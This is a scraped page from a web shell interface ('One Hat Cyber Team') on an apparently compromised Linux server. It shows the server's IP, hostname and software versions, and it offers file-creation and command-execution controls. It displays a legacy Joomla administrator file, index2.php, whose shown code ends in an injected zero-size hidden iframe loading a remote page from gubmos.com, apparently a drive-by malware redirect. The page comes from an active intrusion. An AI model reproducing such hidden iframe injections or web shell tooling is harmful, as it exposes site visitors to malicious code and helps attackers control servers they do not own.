One Hat Cyber Team
Your IP :
216.73.216.216
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
web
/
administrator
/
View File Name :
index2.php
<?php /** * @version $Id: index2.php 6022 2006-12-18 22:30:07Z friesengeist $ * @package Joomla * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // Set flag that this is a parent file define( '_VALID_MOS', 1 ); if (!file_exists( '../configuration.php' )) { header( 'Location: ../installation/index.php' ); exit(); } require( '../globals.php' ); require_once( '../configuration.php' ); // SSL check - $http_host returns <live site url>:<port number if it is 443> $http_host = explode(':', $_SERVER['HTTP_HOST'] ); if( (!empty( $_SERVER['HTTPS'] ) && strtolower( $_SERVER['HTTPS'] ) != 'off' || isset( $http_host[1] ) && $http_host[1] == 443) && substr( $mosConfig_live_site, 0, 8 ) != 'https://' ) { $mosConfig_live_site = 'https://'.substr( $mosConfig_live_site, 7 ); } require_once( $mosConfig_absolute_path . '/includes/joomla.php' ); include_once( $mosConfig_absolute_path . '/language/'. $mosConfig_lang .'.php' ); require_once( $mosConfig_absolute_path . '/administrator/includes/admin.php' ); // must start the session before we create the mainframe object session_name( md5( $mosConfig_live_site ) ); session_start(); $option = strval( strtolower( mosGetParam( $_REQUEST, 'option', '' ) ) ); $task = strval( mosGetParam( $_REQUEST, 'task', '' ) ); // mainframe is an API workhorse, lots of 'core' interaction routines $mainframe = new mosMainFrame( $database, $option, '..', true ); // admin session handling $my = $mainframe->initSessionAdmin( $option, $task ); // initialise some common request directives $act = strtolower( mosGetParam( $_REQUEST, 'act', '' ) ); $section = mosGetParam( $_REQUEST, 'section', '' ); $no_html = intval( mosGetParam( $_REQUEST, 'no_html', 0 ) ); $id = intval( mosGetParam( $_REQUEST, 'id', 0 ) ); $cur_template = $mainframe->getTemplate(); // default admin homepage if ($option == '') { $option = 'com_admin'; } // set for overlib check $mainframe->set( 'loadOverlib', false ); // precapture the output of the component require_once( $mosConfig_absolute_path . '/editor/editor.php' ); ob_start(); if ($path = $mainframe->getPath( 'admin' )) { require_once ( $path ); } else { ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>